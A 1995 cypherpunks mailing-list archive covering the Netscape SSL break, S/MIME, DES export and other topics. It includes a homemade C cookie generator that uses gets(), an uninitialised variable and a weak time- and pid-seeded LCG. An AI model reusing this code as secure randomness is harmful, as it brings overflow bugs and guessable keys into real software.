This is a serious business, but it has elements of
unintended burlesque. William Ellwood of Columbus. Ohio,
joined up after his small business collapsed and he found
that he still owed the Internal Revenue Service $5,100.
Frustrated and annoyed, he took to researching the
Constitution and concluded that he was living in a land
that infringed on his personal liberty. One thing led to
another until he found himself ticketed by a police
officer for weaving on a highway. His reading of the
Constitution made the ticket null and void. "What we're
saying," he patiently explains, "is the motor-vehicle
laws are laws of commerce. I don't use the laws for
private gain, so why do I have to be stopped?" Ellwood
eventually paid the ticket, but not before he and a small
group of like-minded citizens reached out to organizer
Schechter. Now they meet every Tuesday to have their day
in a court of their own making.

Thomas Heath in Denver and Connie Leslie

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Sun, 17 Sep 95 22:26:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation is broken!
Message-ID: <199509180525.HAA06519@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

Neat, I'd say. Has everyone sold their Netscape Comm stock yet? :-)

I guess we should send them the draft-ietf-security-randomness-00.txt
asap.

I was also thinking about how many Credit Card numbers will pass
between now and the moment Netscape has done anything about it.
This piece of information does have quite a value, I'd say.

I have included a short program that tries to generate non-guessable
random numbers. It was written a bit back, and my coding style isn't
all that good. It might be interesting, or not.  (Btw, if you find any
problems with it, I'd appreciate to know about it.)

/Christian


----- ZZ: README -----
asadi -
   "As strong as DES is" (hopefully)

Written by: Christian Wettergren
            cwe@nada.kth.se
            February 1993

Introduction
------------

This utility generates a "random" hexstring, which can be used as input
to xauth, for example. It uses a private secret and some other input
to generate the hexstring. In this way a long-term secret can be used
to generate a short-term secret. Since the short-term secret might be
compromised (different xauth cookies might be tried repeatedly, since 
o warning is emitted from the Xserver) it is not safe to use the
same secret on repeated occasions.

This utility does not even need a private long-term secret, since it
may use the ticket generated within the Kerberos authentication system.
In this way the long-term secret is as guarded as your private password
or the Kerberos master-password.

If you don't use the Kerberos system, you have to regenerate the long-term
secret sometimes (in the same way as you change your password). This
utility tries to help you with that step too. A decent pseudo-random
generator is included, and a routine that helps you generate the secret
might be run.

The short-term secret wont reveal anything about the long-term secret,
since the long-term secret is altered and then encrypted with DES. The
result is the short-term secret. 


Search space
------------

The algorithm used to generate the long-term secret tries to enlarge the
search-space as much as possible. so that an exhaustive attack becomes
difficult.

The factors involved are:

     1/ A good random generator
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

The most important of all is of course the random generator. The included 
generator is a minimum standard.







    Probable usage: 
      echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth 

    DISCLAIMER: No guarantees are made about this
    program, explicit or implicit. It is distributed
    AS IS. etc... :-)

  opensafely() -
  open file, try not to reveal when it was
  written.

  Unfortunately, this is not possible!
  No matter how this is done, at least the
  ctime reveals when it was written.

  If I don't remember incorrectly, there are
  bugs in the filesystem under SunOS, so that
  the ctime-field is updated too often. Maybe 
  this might distort this field sometimes.

  Another approach might be to chmod the file
  whenever it is used. In this way it's ctime
  field is updated and hence overwritten.
  It does not reveal anything extra either, 
  since the approximate time when the cookie is
  generated is probably shown in ~/.Xauthority
  anyway.


/* gensecret() -

   generate a good secret "random" file.

   This routine tries to enlarge the search-space
   for a potential cracker. The involved factors
   are:

     1/ A good random generator (see accompanying file.)
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

   This approach hopefully deters an attack, or at least
   makes it considerably harder for the attacker.

   Does anyone see any weakness in the above approach? It
   is not based on any cryptological analysis, so no
   guarantees are made of it's appropriateness.
*/

  fprintf(stderr, "asadi - generate a good random hexstring based on\n");
  fprintf(stderr, "        a private secret as a seed. (This secret can\n");
  fprintf(stderr, "        be the Kerberos ticket-file.) Could be used\n");
  fprintf(stderr, "        for getting a good xauth-cookie, for example.\n\n");
  fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n");
  fprintf(stderr, "       -r   -- generate a secret file (default: ~/.secret\n");
  fprintf(stderr, "       -l n -- how many 8-byte blocks to output (default: 16)\n");
  fprintf(stderr, "       -v   -- verbose, not very interesting.\n");
  fprintf(stderr, "       filename -- name of secret file (default: Kerberos\n");
  fprintf(stderr, "                   ticket file, or ~/.secret)\n");


---- ZZ: asadi.c ----

/*****************************************
    asadi v1.1 -
      "As strong as DES is" (hopefully)

    This utility generates a "random" 
    hexstring, which can be used as input
    to xauth, for example. Either a Kerberos
    ticketfile or a secret file is used as
    seed to the random generator. Other input
    is probably hostid, process id and time,
    depending on the implementation of the 
    DES-library.

    The random generator used is the DES-
    algorithm. This method is guaranteed 
    not to reveal anything about the used 
    seed. To crack the cookie you have to 
    crack DES. (There is also a normal good 
    pseudo-random generator included, to
    facilitate the generation of secrets.)


    Written by: Christian Wettergren
                cwe@nada.kth.se
                February 1993

    Usage:
      asadi [keyfilename] [-v] [-l num] [-r]

    The number of 8-byte blocks to 
    generate can be controlled with the 
    -l-switch. There is also a verbose-
    switch.

    If one does not use Kerberos, a secret file
    can be used as a key instead. The contents 
    of this file will not be revealed by this 
    program, but you should of course NOT USE 
    your password anyway!

    To help generate this secret file is a
    decent (according to it's author, not me) random-
    generator included in this program. Use
    the r-switch for this. It deposits the secret
    in the file ~/.secret (with the appropriate
    chmod). This file is also used if there is
    no Kerberos.

    Probable usage: 
      echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth 

    DISCLAIMER: No guarantees are made about this
    program, explicit or implicit. It is distributed
    AS IS. etc... :-)
*****************************************/


/* Settings of this program */

#define USEKRB /* switches the use of Kerberos on/off */
#define DEFAULTKEYLEN  8 /* multiples of 16 nibbles */
#define SECRETFILE ".secret"


#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <utime.h>
#include <fcntl.h>
#include <des.h>
#ifdef USEKRB
#include <krb.h>
#endif

/* some unprototyped routines */
extern char *getpass();
extern void goodsrand(unsigned long);
extern unsigned long goodrand(void);
extern char *getenv(char *);
extern void *malloc(int);


/* Globals */
char *keyfile = NULL;
int vflag = 0;
int keylen = DEFAULTKEYLEN;

int major = 1; /* version of program */
int minor = 0;

/* calculate a secret key from the file. */

/* Algorithm: read 8 bytes, add them byte-wise to the
   cblock, continue until eof.

   Hence there is no actual reason to use files
   larger than eight bytes, but the above approach is
   used since the ticket-files are larger. (In this 
   way I don't have to care about file's structure 
   too much, either.)
*/
void calcsecretkey(char *file, des_cblock *key) {

  des_cblock tmp;
  int i;
  int fd;

  if (vflag)
    fprintf(stderr, "file: %s\n", keyfile);

  if ((fd = open(file, O_RDONLY)) == -1) {
    fprintf(stderr, 
	    "Could not open '%s', no cookie generated! (errno=%d)\n", 
	    file, errno);
    exit(1);
  }

  while (read(fd, &tmp, sizeof(des_cblock)) == sizeof(des_cblock)) {
    for(i = 0; i < sizeof(des_cblock); i++)
      *((unsigned char *)key + i)
	= *((unsigned char *)key + i) + *((unsigned char *)tmp + i);
    DES_ZERO_CBLOCK(tmp);  /* fixes eof-condition */
  }

  /* close the file */
  if (close(fd) == -1) {
    fprintf(stderr, "Could not close file! (errno=%d)\n", errno);
    exit(1);
  }
}


void printcblock(FILE *fd, des_cblock *blk) {

  int i;
  for(i=0; i < sizeof(des_cblock); i++) {
    fprintf(fd, "%02x", 
	   (unsigned int)(*((unsigned char *)blk + i) & 255));
  }
}

/* 
  opensafely() -
  open file, try not to reveal when it was
  written.

  Unfortunately, this is not possible!
  No matter how this is done, at least the
  ctime reveals when it was written.

  If I don't remember incorrectly, there are
  bugs in the filesystem under SunOS, so that
  the ctime-field is updated too often. Maybe 
  this might distort this field sometimes.

  Another approach might be to chmod the file
  whenever it is used. In this way it's ctime
  field is updated and hence overwritten.
  It does not reveal anything extra either, 
  since the approximate time when the cookie is
  generated is probably shown in ~/.Xauthority
  anyway.
*/
int opensafely(char *file) {

  int fd;

  /* delete old file, if any */
  if (unlink(file) == -1) {
    if (errno != ENOENT) {
      fprintf(stderr, "Error: could not unlink '%s'. (errno=%d)\n", 
	      file, errno);
      exit(1);
    }
  }

  /* open it again */
  if ((fd = open(file, O_WRONLY|O_CREAT, S_IRUSR)) == -1) {
    fprintf(stderr, "Error: could not create '%s'. (errno=%d)\n", 
	    file, errno);
    exit(1);
  }
  return(fd);
}

/* gensecret() -
   generate a good secret "random" file.

   This routine tries to enlarge the search-space
   for a potential cracker. The involved factors
   are:

     1/ A good random generator (see accompanying file.)
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

   This approach hopefully deters an attack, or at least
   makes it considerably harder for the attacker.

   Does anyone see any weakness in the above approach? It
   is not based on any cryptological analysis, so no
   guarantees are made of it's appropriateness.
*/
void gensecret(char *file) {

  int i,j;
  struct timeval t, s;
  unsigned long d, u, v;
  int fd;
  unsigned long x;
  char *c;
  char n[100];
  int ta, b;
  struct utimbuf tm;

  /* Get time before enter */
  gettimeofday(&s, (struct timezone *)0);
  
  /* heading */
  printf("\nGenerating a Secret!\n");

  /* get user's response */
  printf("\nCAUTION! Don't use your password below!\n");
  printf("You don't have to remember this data, so\n");
  printf("just type something in.\n\n");
  c = getpass("Enter something:");

  /* get time after enter */
  gettimeofday(&t, (struct timezone *)0);
  d = t.tv_usec - s.tv_usec;

  /* make something of input */
  for(j=0; j < strlen(c) / sizeof(unsigned long); j++) {

    /* collect sizeof(long) bytes of input */
    for(v=0, i=0; i < sizeof(unsigned long); i++) 
      v = (v << 8) + c[i+j*sizeof(unsigned long)];

    /* xor them together */
    u ^= v;
  }

  /* get throw-away factors */
  printf("\nEnter a throw-away factor: ");
  gets(n);
  ta = atoi(n);
  printf("\nEnter a step factor: ");
  gets(n);
  b = atoi(n);

  /* verbose */
  if (vflag) {
    fprintf(stderr, "text: %s\n", c);
    fprintf(stderr, "garbled text: %ld\n", u);
    fprintf(stderr, "elapsed: %ld\n", d);
    fprintf(stderr, "time: %ld %ld\n", t.tv_sec, t.tv_usec);
    fprintf(stderr, "pid: %d\n", getpid());
    fprintf(stderr, "hostid: %d\n", gethostid());
    fprintf(stderr, "throw-away factor: %d\n", ta);
    fprintf(stderr, "step factor: %d\n", b);
    fprintf(stderr, "generated seed: %ld\n", t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);
  }

  /* init random generator */
  goodsrand(t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);
  
  /* open the file safely */
  fd = opensafely(keyfile);

  /* throw-away ta numbers */
  for(i=0; i < ta; i++)
    (void)goodrand();

  /* 
     this actually writes sizeof(long) 
     times too much data, but it does not
     matter. 
  */
  for (i=0; i<sizeof(des_cblock); i++) {

    x = goodrand();
    if (write(fd, &x, sizeof(unsigned long)) != sizeof(unsigned long)) {
      fprintf(stderr, 
	      "Error: could not write '%s'. (errno=%d)\n", 
	      keyfile, errno);
      exit(1);
    }

    /* throw-away (step) b numbers */
    for(j=0; j < b; j++)
      (void)goodrand();
  }

  /* close the file */
  if (close(fd) == -1) {
    fprintf(stderr, 
	    "Error: could not close '%s'. (errno=%d)\n", 
	    SECRETFILE, errno);
    exit(1);
  }
  
  /* 
     reset times on file.
     (ctime still shows the creation-time though) 
  */
  tm.actime = 0;
  tm.modtime = 0;
  if (utime(keyfile, &tm) == -1) {
    fprintf(stderr, "warning: could not reset times on file '%s'.\n", keyfile);
    fprintf(stderr, "You should /bin/touch it manually at a later time!\n");
  }

  fprintf(stderr, "Secret written to '%s'.\n", keyfile);
}

void hidedate(char *file) {

  if (chmod(file, 0) == -1) {
    fprintf(stderr, "warning: could not chmod '%s'. (errno=%d)\n");
  }
  if (chmod(file, S_IRUSR) == -1) {
    fprintf(stderr, "warning: could not chmod '%s'. (errno=%d)\n");
  }
}

void usage(void) {

  fprintf(stderr, "asadi v%d.%d\n", major, minor);
  fprintf(stderr, "        generate a good random hexstring based on\n");
  fprintf(stderr, "        a private secret as a seed. (This secret can\n");
  fprintf(stderr, "        be the Kerberos ticket-file.) Could be used\n");
  fprintf(stderr, "        for getting a good xauth-cookie, for example.\n\n");
  fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n");
  fprintf(stderr, "       -r   -- generate a secret file (default: ~/.secret\n");
  fprintf(stderr, "       -l n -- how many 8-byte blocks to output (default: 16)\n");
  fprintf(stderr, "       -v   -- verbose, not very interesting.\n");
  fprintf(stderr, "       filename -- name of secret file (default: Kerberos\n");
  fprintf(stderr, "                   ticket file, or ~/.secret)\n");
}

int main(int argc, char *argv[]) {

  int i;
  int l;
  int rflag = 0;
  int gfn = 0;
  des_cblock key;
  des_cblock out;

  /* Handle options */
  for (i=1; i < argc; i++) {
    
    if (argv[i][0] == '-') {
      switch(argv[i][1]) {

      case 'v':
	vflag++;
	break;

      case 'l':
	i++;
	keylen = atoi(argv[i]);
	break;

      case 'r':
	rflag++;
	break;

      case 'h':
	usage();
	return(1);
	break;

      default:
	fprintf(stderr, "error: Unknown option '%s'.\n", argv[i]);
	usage();
	return(1);
      }
    }
    else {
      keyfile = argv[i];
      gfn++;
    }
  }

#ifdef USEKRB
  if (!keyfile && !rflag) {
    keyfile = tkt_string();
    gfn = 0;
  }
#endif
  if (!keyfile) {
    char *h;
    if ((h = getenv("HOME")) == NULL) 
      h = ".";
    keyfile = malloc(sizeof(char) * strlen(h) + 2 + strlen(SECRETFILE));
    strcpy(keyfile, h);
    strcat(keyfile, "/");
    strcat(keyfile, SECRETFILE);
    gfn++;
  }

  /* Which mode are we in? */
  if (rflag) {
    gensecret(keyfile);
    return(1);
  }

  /* hide creation-date */
  if (gfn)
    hidedate(keyfile);

  /* calculate secret key from file */
  calcsecretkey(keyfile, &key);

  /* show secret key, if verbose mode */
  if (vflag) {
    fprintf(stderr, "secret key: ");
    printcblock(stderr, &key);
    fprintf(stderr, "\n");
  }

  /* init the DES random-generator */
  des_init_random_number_generator(&key);

  /* remove traces of secret key */
  DES_ZERO_CBLOCK(key);

  /* generate output */
  for(l=0; l < keylen; l++) {
    des_random_cblock(&out);
    printcblock(stdout, &out);
    DES_ZERO_CBLOCK(out);
  }
  printf("\n");

  return(0);
}


----- ZZ: rand.c -----
/*
 * This program is public domain and was written by William S. England
 * (Oct 1988).  It is based on an article by:
 *
 * Stephen K. Park and Keith W. Miller. RANDOM NUMBER GENERATORS:
 * GOOD ONES ARE HARD TO FIND. Communications of the ACM,
 * New York, NY.,October 1988 p.1192

   From: wengland@stephsf.com (Bill England)
   Newsgroups: alt.sources,comp.lang.c,rec.games.programmer,comp.os.msdos.programmer
   Subject: Re: random number generator (random.c)
   Date: 5 Jan 92 20:12:08 GMT
   Organization: Stephen Software Systems Inc., Tacoma/Seattle, +1 800 829 1684

Modifications;

   Sun Feb 10 18:20:38 PST 1991
    WSE, modified for replacement of random number object file
    under unix and for use with Perl.

 The following is a portable c program for generating random numbers.
 The modulus and multipilier have been extensively tested and should
 not be changed except by someone who is a professional Lehmer generator
 writer.  THIS GENERATOR REPRESENTS THE MINIMUM STANDARD AGAINST WHICH
 OTHER GENERATORS SHOULD BE JUDGED. ("Quote from the referanced article's
 authors. WSE" )
*/

#include <stdio.h> 

#define	m  (unsigned long)2147483647
#define	q  (unsigned long)127773

#define	a (unsigned int)16807
#define	r (unsigned int)2836

/*
** F(z)	= (az)%m
**	= az-m(az/m)
**
** F(z)  = G(z)+mT(z)
** G(z)  = a(z%q)- r(z/q)
** T(z)  = (z/q) - (az/m)
**
** F(z)  = a(z%q)- rz/q+ m((z/q) - a(z/m))
** 	 = a(z%q)- rz/q+ m(z/q) - az
*/

/*
**
*/
unsigned long seed;

void goodsrand( /* unsigned long*/ initial_seed)
unsigned long initial_seed;
{
    seed = initial_seed; 
}
/*
**
*/
unsigned long goodrand(/*void*/){

register
int 	lo, hi, test;

    hi   = seed/q;
    lo   = seed%q;

    test = a*lo - r*hi;

    if (test > 0)
	seed = test;
    else
	seed = test+ m;

    return seed;
}

#ifdef TEST1
/*  
**   The result of running this program should be
**   1043618065.  If this program does not yeild this
**   value then your compiler has not implemented this
**   program correctly.
*/

main(/*void*/)
{
unsigned 
long	n_rand;

register int 	i;
int	success = 0;

    goodsrand(1);

    for( i = 1; i <= 10001; i++){
        n_rand = goodrand();

        if( i> 9998)  
	    printf("Sequence %5i, Seed= %10i\n", i, seed ); 

	if( i == 10000) 
	    if( seed == 1043618065 ) 
		success = 1;
    }

    if (success){
	printf("The random number generator works correctly.\n\n");
	exit(0);
    }else{
	printf("The random number generator DOES NOT WORK!\n\n");
	exit(1);
    }
}
#endif
/*
-- 
 +-  Bill England,  wengland@stephsf.COM -----------------------------------+
 |   * *      H -> He +24Mev                                                |
 |  * * * ... Oooo, we're having so much fun making itty bitty suns *       |
 |__ * * ___________________________________________________________________| 
*/


---- ZZ: Makefile ----

#
# Makefile for asadi.
#

CC=gcc
CFLAGS=-g
LIBS=-lkrb -ldes

asadi: asadi.c rand.o
	${CC} ${CFLAGS} -o asadi asadi.c rand.o ${LIBS}

rand.o: rand.c
	$(CC) -c rand.c




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danjw@earthlink.net (Dan Weinstein)
Date: Mon, 18 Sep 95 00:27:34 PDT
To: cypherpunks@toad.com
Subject: Netscape Navigator 2.0 will implement secure e-mail
Message-ID: <199509180727.AAA23196@atlas.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


I just got off of Netscapes home page and they have announced Netscape
Navigator 2.0. It will include full e-mail funtionality with S/MIME
implemented.  Does anybody know anything about the S/MIME Protocol?
How secure is it?



Dan Weinstein
danjw@earthlink.net
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.

"I understand by 'freedom of Spirit' something quite difinite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 04:31:19 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: New Ecash Shop
Message-ID: <v02120d03ac83084712cc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Now, this looks interesting...

Cheers,
Bob Hettinga

--- begin forwarded text

From: kulz@dragon.klte.hu (Kultsar Zoltan)
Subject: New Ecash Shop
To: rah@shipwright.com
Date: Mon, 18 Sep 1995 12:30:19 +0200 (MET DST)
MIME-Version: 1.0


  I have opened a new unofficial shop, that accepts ecash.
It's unofficial, because it has not yet a logo.
It is an autoresponder, which automatically sends out documents
that people reques. Uploading costs 5 USD or 15 cb$s (minimum
charges). Your documents will also be available on www, or you
can build your homepage if you wish, but I can provide only slow
links yet. I bought the original autoresponder for ecash, but it in
its original form wasn't secure. Eg. 'send *' type requests sent
out private material. Now it's completely secure.

   Send mail

        To: kulz@dragon.klte.hu
        Subject: send faxbank

There is also a www page at

        http://dragon.klte.hu/~kulz/faxbank.html,

where you can view the documents online.
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 18 Sep 95 07:54:40 PDT
To: cwe@it.kth.se>
Subject: Re: Netscape SSL implementation is broken!
Message-ID: <ac83454201021004a29a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 PM 9/17/95, Perry E. Metzger wrote:
>Christian Wettergren writes:
>> I guess we should send them the draft-ietf-security-randomness-00.txt
>> asap.
>
>I thought that was an RFC by now.
>
>Perry
It is! RFC 1750.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 01:35:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <199509180727.AAA23196@atlas.earthlink.net>
Message-ID: <43jau5$qbj@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509180727.AAA23196@atlas.earthlink.net>, danjw@earthlink.net (Dan Weinstein) writes:
> I just got off of Netscapes home page and they have announced Netscape
> Navigator 2.0. It will include full e-mail funtionality with S/MIME
> implemented.  Does anybody know anything about the S/MIME Protocol?
> How secure is it?

  You can find some documents about s/mime on RSA's web site:

	http://www.rsa.com/ftpdir/pub/S-MIME/

S/MIME is basicly a mime body enveloped in a PKCS7 message.  You can
find out more about PKCS from:

	http://www.rsa.com/ftpdir/pub/pkcs

The implementation guide recommends using rc2-cbc 40-bit for content
encryption when there is no way to determine the capabilities of the
recipient.  When you do know what the recipient can do, it recommends
using RC2-CBC with a longer key or DES-CBC.

For key encryption support for RSA with key sizes of 512 to 1024 is
required, and support for 2048 bit keys is recommended.  A minimum
key size of 768 bits is recommended for US users.

> Dan Weinstein

  Hi Dan.  Yes, we are related.  :-)

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Mon, 18 Sep 95 06:56:53 PDT
To: Steve Bryan <sbryan@maroon.tc.umn.edu>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <v02130501ac814d566452@[204.221.10.130]>
Message-ID: <Pine.3.89.9509180959.B28455-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


No chance. The problem for me isn't that someone wanted to call a movie 
Hackers but that it causes confusion in that for eleven years there has 
been a preexisiting work by that name.  There is a novelization of the 
screenplay now in paperback, so when if a friend recommends that you buy 
Hackers, you'll probably buy that one. (especially since Dell is 
determined to do as little as possible for my own book). 

On Sun, 17 Sep 1995, Steve Bryan wrote:

> At 8:36 pm 9/16/95, Steven Levy wrote:
> 
> >>I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >>is curiosity." 
> >
> >It may not be a crime, but it's not nice to steal a title.
> 
> I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appeareance of the author of the identically named book?
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 09:58:40 PDT
To: perry@piermont.com
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180527.BAA28782@frankenstein.piermont.com>
Message-ID: <199509181652.JAA23706@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Anyway, congratulations to you and Dave on an excellent piece of
> work. I say a bunch of us should buy you "I broke Netscape's security
> and all I got was this lousy T-Shirt" shirts, if only someone would
> design them!
> 

	If someone would design them (i'll see if my graphic designer
is up to the task, but he's on vacation right now), Community
ConneXion will make/fund them. 

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 18 Sep 95 07:12:45 PDT
To: <cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509181412.AA15673@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 

> It may not be a crime, but it's not nice to steal a title.

You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
I saw this (in an Off-Off-Broadway production), years before your book came
out.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:21:55 PDT
To: Charles Lewton <clewton@netcom.com>
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509181421.KAA01808@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 9/15/95 -0700, Charles Lewton wrote:

>Not quite squashed, Duncan.  Bullet placement (poor by some standards)
>is all that prevented Mr. Weaver from croaking like his unfortunate wife.
>She is said to have "pissed off" the feds but was not charged with a
>single actionable item yet she remains quite dead.
>
>Unless I have missed something somewhere, no TLA is concerned in the slightest
>with individual liberty.  That notion should keep a rational person awake
>nights.
>
>Chuck
>

In response to Chuck and Lucky, I can only say that the Weavers suffered 57%
casualties (4/7) and 28% KIA (2/7).  The Feds suffered .25% KIA (1/400).  I
don't think any Feds were merely wounded.

They brought murder charges against two members of the group and lost.  They
settled wrongful death suits for $3.1 million.  They also lost the publicity
war.  They had to change their procedures because of Ruby Ridge and Waco.
They energized the opposition.

The casualties were unfortunate but when facing force ratios of 57/1 or
better, the outcome has to be considered a major victory for Randy Weaver.
The case is a demonstration of modern conflicts in which litigation and
publicity count as much as guns.  On that field, the Feds don't hold all the
cards.

DCF

"The libertarian and conservative coalition of the 'Right' is a
low-maintenance coalition because its members mostly want to be left alone
while the special interest group coalition of the 'Left' is a
high-maintenance coalition because all of its members need to be given a
vast dose of government cash daily."   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:23:07 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxy Alpha release available
Message-ID: <199509181421.KAA01875@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks.  What we now need is a proxy located in the US with good connections
for performance.  Does anyone know a good test page that reads back the info
your browser is putting out so you can test proxies?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:27:17 PDT
To: trei@process.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <199509181426.KAA03412@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 AM 9/18/95 -6, Peter Trei wrote:

>> It may not be a crime, but it's not nice to steal a title.
>
>You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of
the same name?
>I saw this (in an Off-Off-Broadway production), years before your book came
>out.


Steven knows titles can't be copyrighted.  He was just expressing the wish
that they had come up with their own title.  I'm pissed because the sequel
to Jurassic Park is stealing the title of Sir Arthur Conan Doyle's dinosaur
novel "Lost World."  Unfortunately, title-space is more limited than book-space.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 03:41:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID: <43jibb$5ok@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.950918185301.29263B-100000@orb>, eay@mincom.oz.au (Eric Young) writes:
> Hmm....  notice the use of a non public cipher as the base cipher.... 
> what a shame.... 

  The only reason for this is US export laws.

> It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, 
> des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128.  If people could send 
> me the official Object identifiers for these ciphers, I'll be able to 
> support them in PKCS-7, otherwise they will only be supported in PEM mode.

  Here are the ones I have:

     DES-ECB OBJECT IDENTIFIER ::= { algorithm 6 } 
     DES-CBC OBJECT IDENTIFIER ::= { algorithm 7 } 
     DES-OFB OBJECT IDENTIFIER ::= { algorithm 8 } 
     DES-CFB OBJECT IDENTIFIER ::= { algorithm 9 } 
     DES-MAC OBJECT IDENTIFIER ::= { algorithm 10 } 
     DES-EDE OBJECT IDENTIFIER ::= { algorithm 17 }

     where 

     algorithm OBJECT IDENTIFIER ::=  
       {iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)}


	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 18 Sep 95 10:48:58 PDT
To: cypherpunks@toad.com
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509181711.AA15476@sulphur.osf.org>
Message-ID: <199509181748.KAA17616@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Rich Salz <rsalz@osf.org> writes:
> 
> This seems to be
> /* Sofware DES functions
> * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
> * the 1977 public-domain program by Jim Gillogly
> * Modified for additional speed - 6 December 1988 Phil Karn
> * Modified for parameterized key schedules - Jan 1991 Phil Karn

> Would someone from outside the US try to download the above file?
> It would be, at least, amusing if an Air Force site were in violation
> of the ITAR (their README notwithstanding).

Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts
us in the same position as Phil Zimmermann, right?  Oh -- except that our
offenses may already be beyond the statute of limitations.

	Jim Gillogly
	Trewesday, 27 Halimath S.R. 1995, 17:48




